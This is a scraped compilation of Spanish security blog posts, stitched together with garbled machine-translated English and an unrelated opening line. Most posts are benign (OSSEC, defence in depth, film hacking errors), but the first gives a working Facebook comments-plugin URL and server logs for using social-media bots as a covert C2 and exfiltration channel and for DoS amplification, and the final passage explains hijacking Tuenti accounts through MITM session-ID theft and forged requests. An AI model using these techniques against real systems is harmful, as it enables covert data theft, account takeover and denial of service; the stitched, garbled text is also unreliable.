The Information Systems and Computer Applications examination covers material that is usually taught in an introductory college-level business information systems course.

Posts tagged “security

APT: bot exfiltration

Dentro del mundo de las amenazas avanzadas persistentes o APTs, juegan un papel muy importante las técnicas utilizadas por los artefactos malware, para comunicarse y exfiltrar información a través de los C2s (Command & Control). En este aspecto existen tantas formas como imaginación pueda aportar el atacante y como protocolos y servicios existan. Un pequeño ejemplo de los “trucos” para enmascarar el tráfico ilegítimo como información aparentemente normal son:

  • Peticiones HTTP a páginas aparentemente lícitas, las cuales han sido crackeadas, albergando código del C2.
  • Sobreutilización del protocolo DNS para exfiltrar y comunicarse con los atacantes.
  • Sobreutilización de Google Calendar.

La lista anterior puede ser tan larga casi como campañas APT han existido y existen. En este post me gustaría aportar una nueva forma de exfiltración en la cual el equipo infectado y el C2 en ningún momento intercambian información directamente, sino que lo hacen a través de la legión de bots que los grandes gigantes de Internet disponen. Estos son Google, Facebook o Twitter entre otros.

¿Para qué sirven o qué función tienen estos bots? En el caso de Facebook, esta compañía dispone de una serie de agentes utilizados para realizar una previsualización del contenido de un enlace cuando se postea un comentario en esta red social. De esta manera, es posible presentar al usuario de una forma más amigable el contenido Web enlazado. Así, cuando el enlace es recibido por Facebook éste “ordena” a sus bots que visiten dicha URL extrayendo información de la web asociada.

El lector ya se habrá dado cuenta que controlando la URL a la cual queremos que los bots se conecten, disponemos de una forma de remitir información a un dominio propiedad del atacante, redirigiendo la petición a través de Facebook. De esta manera, ya tenemos el primer canal de comunicación “Equipo infectado” -> “C2”. Esta petición pasará totalmente desapercibida para los posibles analistas de seguridad del organismo víctima, ya que realmente son peticiones realizadas contra la red social.

El primer impedimento encontrado para ejecutar la redirección fue que necesitaba tener una cuenta de Facebook válida y estar autenticado para poder postear. Revisando un poco más a fondo por la documentación del “Caralibro” encontré la solución para poder postear sin estar autenticado. Esa magia la aportó la sección de “Developers”. A continuación, os dejo la petición GET para controlar los bots de Facebook a vuestro antojo, visitando todo aquello que vosotros les remitáis.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMINIO A VISITAR
&locale=en_US
&numposts=2
&sdk=joey
&width=500

Un avispado ya se habrá dado cuenta que esto no sólo puede ser utilizado para exfiltrar información sino para por ejemplo realizar ataques de DoS encubiertos o aumentar contadores de visitas. Como ejemplo, os dejo el log de mi apache, tras decirle a Facebook que visite mi web.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-"
    "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1
       (+http://www.facebook.com/externalhit_uatext.php)"

La verdad es que se puede conseguir una buena amplificación, ya que una sola petición a Facebook generó 43 GETs de 10 bots distintos a la web destino. Pero no quiero desviarme del tema, que estamos a APTs.

Ahora que tenemos la forma de exfiltrar necesitamos poder remitir comandos de control a los equipos infectados en la organización víctima. Para esta parte nos van a ayudar los bots de Google, los cuales también podemos controlar para que no sólo visiten lo que nosotros queramos sino que además le remitan por nosotros a los equipos infectados las ordenes a realizar.
Normalmente cuando un C2 quiere ejecutar un comando en la víctima la comunicación no se hace en el sentido C2 -> “equipo infectado” sino al revés, siendo el portador del malware el que inicia comunicación.

Pues bien, Google dispone de una url por la que, dado un dominio, ésta te devuelve el favicon del mismo, lo que resulta perfecto para remitir en el mismo las órdenes a ejecutar en el equipo infectado.

http://www.google.com/s2/favicons?domain=DOMINIO-A-VISITAR

Una vez ejecutada, podemos ver en el log del C2 la siguiente petición realizada por el bot:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-"
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-"
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

En este favicon podemos, por ejemplo con técnicas estenográficas, incluir la información de control remitida al equipo infectado. Así pues, tenemos establecida una comunicación bidireccional con los C2 sin establecer en ningún momento un canal directo entre equipos infectados y equipos de mando y control, perfecto para pasar desapercibidos.


OSSEC: Introducción by Alejandro Ramos

OSSEC es un Host IDS opensource que incluye características que lo convierten en una herramienta muy interesante para asegurar un sistema, ya sea de la familia Unix o Windows.
Nace como sistema de detención de intrusos basado en logs (LIDS o Log-based Intrusion Detection System)  pero en la actualidad ha evolucionado incluyendo otras funciones, entre ellas:
  • Control de integridad de ficheros: verifica que los ficheros relevantes del sistema no sean alterados de forma no gestionada.
  • Control de integridad del registro: igual al anterior, pero para claves del registro. De esta forma se puede monitorizar si se añade un nuevo servicio, y se conecta un dispositivo USB, si se agrega una aplicación para que arranque al inicio de windows, etcéterra.
  • Detección de rootkits: está basado en firmas y es un poco básico. No es tan completo como algunas soluciones específicas como unhiderkhunter o chkrootkit.
  • Respuesta activa: actuando como IPS, puede añadir reglas al firewall para bloquear hosts que generen eventos determinados.
Aunque la parte más relevante es el análisis y sistema de alertas basado en los logs, para los que dispone de decenas de decodificadores que los procesará con lógica.
Existen dos métodos de instalación, uno local, para un único servidor y otro con orientación cliente-servidor, donde los Agentes desplegados mandan las alertas a un servidor central con funciones de Manager.
El manager recibe y se comunica con los agentes mediante el puerto 1514/udp, por el que se transmiten los registros de forma cifrada (blowfish) y comprimida (zlib).

La aplicación se compone de varios servicios con distintas funciones cada uno de ellos y que serán usados según la configuración. Los más importantes son:

  • syscheckd: se encarga de ejecutar los análisis de integridad.
  • logcollector: recoge todos los logs del sistema, ya sean de syslog, ficheros planos, eventos de windows, etc.
  • agentd: envía los registros al manager remoto.
  • execd: ejecuta las respuestas activas (bloqueo de direcciones IP)
  • remoted: recibe los logs de los agentes remotos.
  • analysisd: proceso principal, se encarga de todo el análisis.
  • maild: manda correos electrónicos con las alertas.

La instalación por defecto se realiza en el directorio /var/ossec. Del que cuelga la configuración en el archivo/var/ossec/etc/ossec.conf.

Los decoders de cada uno de los logs se encuentran en formato XML en el directorio /var/ossec/rules/ y tienen el siguiente aspecto:

Las alertas se almacenan por defecto en /var/ossec/logs/alerts.log, aunque está desplegado un gran número de agentes, es recomendable guardarlas en base de datos. De la que podrán ser procesados con alguna de las consolas existentes.

 

Enhanced by Zemanta

El 77% de los usuarios ha perdido información por no realizar respaldos by André Goujon

Cada mes, los lectores comparten con nosotros tendencias y estadísticas relacionadas a diversos temas de Seguridad de la Información que planteamos a través de las encuestas que realizamos en ESET Latinoamérica. Durante octubre el tópico a tratar fue la pérdida de datos y el uso de respaldos o copias de seguridad. Aunque los códigos maliciosos […]

http://blogs.eset-la.com/laboratorio/2012/11/09/77-usuarios-perdido-informacion-no-realizar-respaldos/

Enhanced by Zemanta

Seguridad y Sostenibilidad

S2. Seguridad y Sostenibilidad

Cuando se habla de sostenibilidad parece que todos estamos de acuerdo en que el desarrollo de la Sociedad de la Información es la opción más adecuada para conseguir una economía productiva, competitiva y eficaz, por la vía del aumento de la productividad y la integración de la innovación como motor de la empresa. Todos damos por sentado que estos factores son necesarios para garantizar la sociedad del bienestar y por tanto la calidad de vida de los ciudadanos de los países desarrollados.

El propio desarrollo de la Sociedad de la Información debe ser sostenible en sí mismo para, a través suyo, poder garantizar la sostenibilidad de la sociedad en uso conjunto.

¿Cómo podemos definir una Sociedad de la Información sostenible? Teniendo en cuenta que:

  • Debe estar disponible
  • Debe ser confiable
  • Debe ser segura
  • Debe ser ubicua
  • Debe ser cómoda y accesible
  • Debe ser asequible
  • Debe regularse

Lo que no tiene sentido es que malhechores y sinvergüenzas de todo tipo campen a sus anchas por “La Sociedad de la Información”, nuestra sociedad virtual, haciendo el mal a diestro y siniestro. Tenemos que aprender a protegernos virtualmente, tenemos que proteger nuestros bienes virtuales, tenemos que desarrollar leyes y equipos profesionales especializados en garantizar un uso seguro de los servicios de la era de las comunicaciones. Necesitamos trabajar mucho para ello. Los profesionales, diseñando servicios que cumplan los principios anteriores. Los gobiernos, legislando para que la justicia pueda hacer su trabajo. Jueces y abogados, formándose para no quedarse boquiabiertos cuando presentamos ante sus narices un delito en la red y los ciudadanos preparándose para entender cómo funcionan sus nuevas vías de comunicación y para poder hacer frente a los granujas de la red que, hoy por hoy, disfrutan del anonimato que les proporciona su propia cobardía.

Nosotros, desde nuestro rincón en el mundo, estamos trabajando para crear una sociedad que entre de pleno derecho y sin miedo en la Sociedad de la Información, en la sociedad de las redes sociales en la sociedad más libre y democrática que puede existir. Desde estas líneas queremos anunciar nuestro compromiso continuado con una Sociedad Sostenible y Segura (Compromiso S2: Sostenibilidad y Seguridad), porque no entendemos una sociedad sostenible en la que la seguridad no esté presente en todas sus dimensiones.

Este compromiso los estamos materializando en proyectos de Responsabilidad Corporativa, de los que daremos cumplida información en cuanto nos sea posible, y en líneas de I+D+i para el desarrollo de nuevos servicios y productos.

Si alguno de nuestros lectores tiene alguna sugerencia en esta línea estaremos encantados de escucharla y, si es el caso, estudiarla.

Security and Sustainability

When talking about sustainability think we all agree that the development of Information Society is the best option to achieve a productive economy, competitive and efficient, by way of increased productivity and innovation integration as an engine of the company. All we assume that these factors are necessary to ensure the welfare society and therefore the quality of life of citizens in developed countries.

The very development of the Information Society must be sustainable in itself to, through you, to ensure the sustainability of society in common use.

How can we define a sustainable information society? Given that:

* Must be available
* Must be reliable
* Must be safe
* Must be ubiquitous
* Must be comfortable and accessible
* Must be affordable
* Should be regulated

What does not make sense is that criminals and crooks of all kinds roam freely with “The Information Society” virtual society, making the wrong right and left. We must learn to protect virtually, we must protect our virtual goods, we must develop laws and specialized professional teams to ensure the safe use of the services of the communication age. We need to work hard for it. Professionals, designing services that meet the above principles. Governments, legislating for justice to do its job. Judges and lawyers, formed not to remain speechless when presented with their noses a crime on the network and preparing citizens to understand how their new roads and to cope with the rascals of the network, today, enjoy the anonymity gives them their own cowardice.

We, from our corner of the world, we are working to create a society that between full and without fear in the Information Society, society of social networks in the free and democratic society can exist. From these lines we announce our continued commitment to a Sustainable Society and Safe (S2 Commitment: Sustainability and Security), we do not understand a sustainable society in which safety is not present in all its dimensions.

This commitment we are materializing in Corporate Responsibility projects, of which give full information as we can, and guidelines for ID i for the development of new services and products.

If any of our readers have any suggestions along these lines will be happy to listen and, if any, study.


from Security Art Work by Guillermo Mir

Las pifias de “Hollywood”

Hace ya varios años, cuando aún estaba estudiando en la facultad, me surgió la oportunidad de ejercer de moderador en una “asignatura” sobre las Ingenierías (y más concretamente, la informática) en el cine. Cada sesión se componía de dos partes: el visionado de una película y un debate posterior. Lo primero que tuve que hacer fue “documentarme” un poquillo, para decidir que películas podían ser interesantes, y que se podía sacar de ellas.

Esta claro que hoy en día no hace falta ver una película que hable de informática para ver el uso de ordenadores en ella, y se podría perdonar la falta de rigurosidad que estas pudieran tener. Lo triste es ver que en las películas en las que la informática forma parte de la trama principal, es las en las que más barbaridades se llegan a ver.

Realizando dicha labor, me encontré con varios blogs que hablaban de las grandes “pifias” que había cometido la industria cinematográfica con la informática. No recuerdo muy bien todos ellos, pero la mayoría estaba de acuerdo con qué películas habían cometido los mayores errores. Todos los blogs coinciden en que las películas que hablan de los hackers son aquellas que peor reflejan la realidad. Por ejemplo los “hackers” saben usar cualquier sistema operativo que además debe estar en suspensión o algo así, porque normalmente tienen una velocidad de arranque que ya quisiéramos, y son capaces de desproteger cualquier sistema en menos de 5 minutos. Un claro ejemplo de esta situación, llevada al límite de lo absurdo es cuando, en Operación Swordfish (Swordfish, 2001), Stanley (Hugh ‘Lobezno’ Jackman) tiene que demostrar que puede entrar en el ordenador del departamento de defensa americano en apenas un minuto, mientras una chica guapa se propone distraerle de una manera un tanto… original, y John “Vincent Vega” Travolta le apunta con una pistola en la sien. Como una imagen vale más que mil palabras os dejo un enlace al vídeo, juzgar vosotros mismos.

Otra capacidad que tienen los hackers es la de programar a toda velocidad. Lo más común son los virus (debe ser que son fáciles de hacer, hecho uno…). Véase por ejemplo Independence Day (Independence Day, 1996), en la que programan un virus capaz de desarmar los escudos de las naves alienígenas (¿os habéis planteado si usarán los Alien TCP/IP para sus comunicaciones?). No olvidéis tampoco que, si accedéis a http://www.fbi.org u otro organismo semejante, vais a la sección “secret files” y, con varios intentos accederéis a los datos más secretos del mundo. Aparte de las películas ya mencionadas, otras en las que aparecen “superhackers” son: The Italian Job (The Italian Job, 2003), Hackers (Hackers, 1995), Misión Imposible (Impossible Mission, 1996), Parque Jurásico (Jurassic Park, 1993)…

Una cosa sí hay que envidiar a los productores americanos: su capacidad de diseñar interfaces 3D “super chulas”, con una velocidad que ni Google. Los archivos que necesitas suelen estar escondidos detrás del cubo verde (otra vez Jurassic Park es un buen ejemplo de ello… ¡ah, y es Unix!), y no se puede acceder a ellos con un par de clicks, lo que hay que hacer es “aporrear” el teclado a toda velocidad para parecer que eres un gran informático. Son unos sistemas basados en la estadística: contra cuanto más rápido teclees, más posibilidades tienes de acertar la combinación de teclas necesarias para llegar al archivo. Eso sí, aunque son sistemas con una capacidad de búsqueda tremenda, tienen un punto flaco, y es a la hora de copiar archivos cruciales para resolver una trama de conspiración a nivel mundial, a un USB, un CD o mandarlos por correo. En ese momento la barra de progreso del copiado se vuelve “leeeeeeeeentaaaaaaaaaaaaaaa” dando tiempo así a que el malote aparezca por la puerta, para dar más tensión a la trama. Por nombrar alguna película más, que no deberíais ver ni aunque la vida os fuera en ello, Firewall (Firewall, 2006) dónde tito Harrison “Jones” Ford es un agente de seguridad, capaz de montar un escáner de última generación con la barra lectora de un fax/multifunción y con un iPod mini mediante la entrada de los cascos (llora McGyver), y sin saber como la cosa funciona de lujo, guardando los no se qué montonada de números de cuenta del banco y los almacena en el disco duro del iPod en forma de imágenes. No contento con esto, los pasa por un OCR y ya tenemos los números de cuenta perfectamente registrados en nuestro portátil… prefiero no hacer comentarios sobre esto.

Son numerosas las películas que, bien utilizados o no, usan al fin un programa real y conocido. El Nmap debe de ser el que se lleva la palma en apariciones cinematográficas, tanto, que sus desarrolladores muestran orgullosos en su página sus numerosas apariciones.

Son muchas las películas que probablemente me olvido de mencionar, pero quiero destacar La Jungla 4.0 (Live Free or Die Hard, 2007) (o cómo puedes salvar el mundo América con un teléfono móvil), en la que al final detectan la IP (supuestamente pública, ya que se está accediendo desde Internet) desde la que se está realizando un ataque, y está es del tipo 10.X.X.X, que como saben es de direccionamiento privado.

Probablemente sabréis de más películas que hablen del tema, bien o mal, pero por encima de todas ellas está una de las películas que más me marcó y no se si es la culpable de que me dedique a esto de las maquinitas, pero seguro que algo influyó. Si amigos, estoy hablando de Juegos de Guerra (War Games, 1983), que con sus virtudes y sus defectos, y a pesar de los años, sigue siendo una de las mejores películas que he visto sobre este tema. Es por eso que fue una de las elegidas para una de las sesiones, que me tocó moderar.

 

For several years, when he was studying in college, I got the chance to become the moderator in a “course” on Engineering (more specifically, computers) in the film. Each session consisted of two parts: the screening of a film and a subsequent discussion. The first thing I had to do was to “document” awhile, to decide which films could be interesting, and could be drawn from them.

It is clear that today do not need a movie to talk computer to see the use of computers in it, and could forgive the lack of rigor that they may have. The sad thing is to see that in movies where the computer is part of the plot, is the most terrible things in it ever see.

Doing this work, I found several blogs that talked about the big “gotcha” that had made the film industry with the computer. I do not remember very well all of them, but most agreed with what movies they had made the biggest mistakes. All blogs agree that the movies that speak of the worst hackers are those that reflect reality. For example, hackers know how to use any operating system must also be in suspension or something, because they usually have a speed boot and wanted, and are able to check out any system in less than 5 minutes. A clear example of this situation to the limit of absurdity is when, in Swordfish (Swordfish, 2001), Stanley (Hugh “Wolverine” Jackman) must demonstrate that the computer can enter the American defense department just a minute, while a pretty girl is proposed to distract from a somewhat original … and John “Vincent Vega” Travolta points a gun to his head. As a picture is worth a thousand words I leave a link to the video, judge for yourselves.

Another ability of hackers is to set it at full speed. The most common are viruses (must be that they are easy to make, made one …). See for example Independence Day (Independence Day, 1996), which scheduled a virus capable of disarming the shields of the alien ships (do you have questioned whether Allen used the TCP / IP for its communications?). Do not forget also that if accedéis to http://www.fbi.org or other similar body, going to the “secret files” and, with various attempts accederéis the secrets of the world data. Besides the aforementioned films, others on the displayed “superhackers are: The Italian Job (The Italian Job, 2003), Hacker (Hacker, 1995), Mission Impossible (Mission Impossible, 1996), Jurassic Park (Jurassic Park, 1993) …

One thing you have to envy the American producers: the ability to design 3D interfaces “super cool” with a speed that neither Google. The files you need are often hidden behind the green bin (again Jurassic Park is a good example of this … oh, and Unix!), And can not be accessed with a few clicks, you have to do is “bashing” the keyboard at full speed to seem like you’re a big computer. They are based on statistical systems: against the faster you type, the more chance you have of hitting the key combination needed to get the file. Yes, but are systems with tremendous search capabilities, have a weakness, and when copying files crucial to solve a web of global conspiracy, a USB, a CD or send by mail. At that time the copy progress bar becomes “leeeeeeeeentaaaaaaaaaaaaaaa” giving time to the smug and the door appears to give more tension to the plot. To name some more film, you should not see even if you life depended on it, Firewall (Firewall, 2006) where tito Harrison “Jones” Ford is a security officer, capable of mounting a last-generation scanner reading the bar a fax / multifunction and an iPod mini with the entry of helmets (cries McGyver), and without knowing how it works estate, saving is not what a quantity of bank account numbers and stored on the hard disk iPod in the form of images. Not content with this, goes through an OCR and we have the account number recorded on our laptop perfectly … I prefer not to comment on this.

There are many films that either used or not used at last a real program and known. The Nmap should be the one takes the cake on film appearances, therefore, that the developers take great pride in his numerous appearances page.

There are many films that I probably forgot to mention, but I want to highlight the Jungle 4.0 (Live Free or Die Hard, 2007) (or how America can save the world with a mobile phone), which detect the IP end (presumably public, as it is being accessed from the Internet) from which an attack is underway, and this is the type 10.xxx, as you know is a private address.

You probably know of more movies to talk about it, good or bad, but above all is one of the movies that influenced me and are not to blame if I dedicate this to the machines, but certainly something influenced. If friends, I’m talking WarGames (War Games, 1983), with its strengths and weaknesses, and despite the years, remains one of the best movies I’ve seen on this topic. That’s why it was one of those chosen for a session that touched me moderate.


Sentineldr

Defensa en Profundidad

Defensa en profundidad no es un concepto nuevo. Se refiere a una estrategia militar que tiene por objetivo hacer que el atacante pierda el empuje inicial y se vea detenido en sus intentos al requerirle superar varias barreras en lugar de una.

Al igual que un campo de batalla, nuestras infraestructuras de tecnología son una compleja formación de elementos que en conjunto albergan uno de los activos más valiosos para las empresas: los datos. Podemos visualizar esta infraestructura como una serie de capas donde los datos ocupan el último nivel, precedidos de contenedores como lo son las localidades físicas, el perímetro, la red, los servidores y las aplicaciones.

De esta forma, cada capa de nuestra infraestructura representa una barrera para el atacante en su camino hacia el objetivo final de acceder a los datos confidenciales, de manera que si falla cualquiera de los controles en una capa haya defensas adicionales que contengan la amenaza y minimicen las probabilidades de una brecha.


En adición, analizar nuestro ambiente de tecnología de esta forma para fines de integrar seguridad permite dividir el problema en partes más pequeñas y manejables, contribuyendo así a mejorar la calidad de su implementación.

A continuación algunas consideraciones importantes sobre las principales defensas de este modelo:

  • Políticas, procedimientos, concientización: Establecen el tono en toda la organización con relación a la protección de los activos de información, definen los objetivos y actividades de control y proveen un criterio de auditoría para el programa de seguridad. Para ser efectivas, las políticas deben ser debidamente comunicadas a todo el personal de la empresa. La concientización es clave debido a que es el personal quien maneja a diario los sistemas y las informaciones, por lo que sin su compromiso no es posible mantener la seguridad.
  • Firewall: La primera línea de defensa a nivel de la red la constituye por lo general el firewall, el cual analiza las conexiones entre redes y restringe el acceso de acuerdo a una política de seguridad. Aunque el rol del firewall ha ido cambiando y su función se ha combinado con otras anteriormente dispersas, el mismo sigue siendo un componente importante de nuestro arsenal de defensas siempre que sea correctamente gestionado. Esto incluye, entre otras acciones, mantenerlos actualizados, administrar las reglas de forma que implementen correctamente las políticas y auditar los eventos.
  • Sistemas de Detección / Prevención de Intrusos: Estos sistemas monitorean el tráfico de la red y alertan y/o previenen cualquier actividad sospechosa en tiempo real. El reto con estos sistemas es disminuir la cantidad de falsos positivos (actividad legítima que se detecta como maliciosa), así como monitorear los eventos de forma activa e implantar procesos adecuados de intervención.
  • NAC: Aunque una tecnología todavía emergente y de relativa poca adopción, el Control de Admisiones a Redes (NAC por sus siglas en inglés) permite inspeccionar los equipos que se conectan a las redes para determinar si los mismos cumplen con las políticas y estándares de seguridad, como por ejemplo contar con software antivirus y parches de seguridad requeridos. A partir de este resultado se puede permitir, restringir o negar el acceso del equipo así como generar alertas e incluso llevar a cabo la remediación correspondiente.
  • Antimalware: Las tecnologías antimalware (las cuales protegen de amenazas como los virus, troyanos, gusanos, botnets, spyware y otras formas de código malicioso) continúan su evolución hacia sistemas más inteligentes, capaces de detectar las amenazas más sofisticadas y complejas sin depender principalmente de firmas estáticas. Estas por igual requieren ser gestionadas correctamente. Asegurar su correcta actualización y monitoreo son aspectos clave para mantener su efectividad.
  • Encriptación: Puede ser considerada la última línea de defensa bajo este modelo. Encriptar o cifrar los datos protege la confidencialidad de los mismos durante su almacenamiento o transmisión por las redes. De esta forma, aunque los demás controles sean comprometidos, los datos permanecen seguros pues no podrán ser leídos a menos que sean descifrados. La seguridad de este mecanismo depende del manejo adecuado de las llaves utilizadas para descifrar los datos, por lo que se debe prestar especial atención a este aspecto.
  • Seguridad Física: Aún tengamos las más estrictas medidas de seguridad lógica, esto no nos protegerá de un intruso que intente sabotear o causar algún daño físico a nuestros sistemas. Por esta razón debemos mantener controles de seguridad física adecuados, tales como CCTV, control de acceso físico, alarmas y vigilancia; particularmente en áreas sensibles como el centro de cómputos.

Finalmente, el involucramiento y compromiso de las distintas áreas de la empresa con los objetivos y actividades de seguridad es esencial para que se mantengan y mejoren a través del tiempo. Para tales fines es necesario promover los beneficios en términos de reducción de riesgos, protección de la imagen, continuidad comercial, cumplimiento regulatorio, entre otros.

Fuente: Sentineldr


Seguridad Informatica

1:00 PM (1 hour ago)WifiWay 2.0.1 from Noticias de Seguridad Informática

 (www.segu-info.com.ar)

WifiWay es una distribución LIVE CD para la auditoria de redes inalambricas, creada por los mismos autores de la famosa distribución Wifislax y que esta cogiendo mucha fuerza por su rapidez y eficiencia a la hora de realizar un trabajo de auditoria inalambrica.

Wifiway esta basado en SLAX y cuenta con 2 versiones, una completa con todos los paquetes que mencionamos abajo y otra versión reducida para equipo menos potentes, que incluye todo lo de la completa pero sin kdeoffice, java-spoonwep, modulo firefox y modulo devel de compilación con las fuentes bases del kernel.
Incluye herramientas de auditoria wireless y además es el único que incorpora el software wlan4xx y su asociación con airoscript, ya que este programa es un desarrollo propio que permite calcular la clave por defecto de algunos routers del mercado.

WifiWay 2.0.1 COMPLETA (408MB) – a9d30a4b1d6f6ae677d895a1da619ac3
WifiWay 2.0.1 REDUCIDO (285MB) – 07e65813771354fcfcd1cf23d79c00ce

Fuente: DragonJAR


Security

Google nos ayuda a mantener la seguridad de nuestra cuenta

Como todos sabéis, la seguridad de la información ha pasado en los últimos años de ser un terreno reservado a unos pocos a estar en boca de todos, gozando de gran repercusión en los medios tradicionales, que hasta hace poco parecían dejar de lado muchas veces el mundo virtual. Con nuestros datos repartidos en cientos de aplicaciones, tanto de escritorio como web, y la facilidad actual para conectarse a Internet, las intromisiones en la seguridad de las aplicaciones y el robo de información personal están a la orden del día.

Es por ello necesario realizar campañas de concienciación para que el usuario medio, normalmente poco consciente de las implicaciones que tiene usar cierta aplicación o servicio y despreocupado a la hora de introducir sus datos personales, contraseñas y/o tarjetas de crédito en cualquier aplicación que se proponga usar, tenga más cuidado en lo que a seguridad de la información y revelación de datos de carácter personal se refiere.

En esta línea, octubre es el mes de la concienciación por la ciber seguridad para la NCSA (National Cyber Security Alliance), que durante todo el mes de octubre está haciendo campaña a través de diferentes canales y a través de las empresas que lo forman. Se han realizado todo tipo de eventos, creado multitud de campañas y cientos de recursos en esta línea.

Pero entre todos ellos destaca por su simplicidad y, a mi juicio, efectividad, la lista de comprobaciones de seguridad que Google ha lanzado para sus cuentas. En ella se cubre la seguridad, únicamente web en este caso, en todos sus aspectos y de una forma sencilla y concisa.

Tenemos 18 recomendaciones repartidas en cinco grupos de elementos: el ordenador, el navegador, configuración de cuenta, configuración de correo electrónico y un muy genérico recomendaciones finales, que engloba otras consideraciones que no caben en las categorías anteriores. Si bien están pensados para las cuentas de Google, son recomendaciones simples que se pueden extrapolar a cualquier otro servicio web, y su uso constituye un ejemplo de buenas prácticas que nunca está de más seguir.

Como contrapartida, decir que esta “checklist” está disponible únicamente en inglés, pero al estar enfocado a un público general el nivel de inglés requerido no es muy técnico, por lo que seguir las directrices que nos recomiendan no debería ser excesivamente complejo. Espero que les sirva de utilidad a ustedes, o si ya las aplican, a otras personas menos puestas en este tema.

Digg del.icio.us Facebook Google Bookmarks BarraPunto E-mail this story to a friend! LinkedIn Netvibes Live Meneame TwitThis

 


Tuenti

Tuenti y las redes locales inseguras – 2/2

Antes de empezar voy a hacer un pequeño resumen de la entrega anterior para que nos ubiquemos en ésta con mayor facilidad.

Como vimos en la primera entrega, podemos aprovechar que el TuentiChat no está cifrado para monitorizar las conversaciones de cualquier usuario que se encuentre en nuestra red local y al que le hayamos realizado previamente el ataque MITM.

A pesar de lo interesante que pueda ser la monitorización de las conversaciones (y las acciones que podamos realizar sobre ellas) creo que es más importante destacar que indirectamente obtenemos el sessionID (de ahora en adelante SID) de la víctima, por lo que nos hacemos con el control total de su cuenta (en realidad casi total, porque algunas acciones requieren la introducción de la contraseña, la cual no obtenemos en ningún momento, por ahora…).

Como se comentó, para poder realizar peticiones en nombre de la víctima necesitaremos, además del SID, el CSFR y en ocasiones el ID (que habremos obtenido durante la monitorización del TuentiChat). Un breve esquema sobre su utilización en las peticiones:

  • Petición GET: SID, ID (a veces)
  • Petición POST: SID, CSFR, ID (a veces)
Bueno, como ya se dijo, en esta segunda entrega se va a hablar de algún ejemplo de peticiones sobre la cuenta de la víctima y sobre robo de sesiones (obligar a la víctima a generar un SID válido) y robo de credenciales (aprovechándonos de que la página de login no está cifrada).

¡Comencemos!

1. Tuenti, yo soy la víctima

Una vez obtenido el SID ya tendríamos control total sobre la cuenta, pues bastaría con abrir nuestro navegador y modificar la cookie SID añadiendo el contenido del de la víctima (abriéndose Tuenti con su sesión). Aun así, si queremos que sea un programa nuestro el que realice las peticiones, voy a dar alguna información sobre como el modificar la información personal de la víctima.

Cuando realicemos la petición no es necesario que enviemos todos los parámetros pero sí todos los relacionados entre sí (por ejemplo los que tienen que ver con el número de teléfono) y, lo más importante, si alguno falla la petición no se procesará, independientemente de que otros datos fueran correctos.

Con respecto a la ciudad, lo importante es el código de la misma (location_hidden) y no su nombre (que no se valida), al contrario que con el barrio (neighborhood_autofill) el cual tiene que tener el nombre exacto o no validará.

Para obtener el código de la ciudad o el nombre del barrio basta con realizar las siguientes peticiones:

{“search_string”:””,”results”:[{“id”:ID,”string”:”CIUDAD”,”info”:{“location”:”CIUDAD”}}]}
{“search_string”:””,”results”:[{“id”:ID,”string”:”BARRIO”,”info”:null}]}

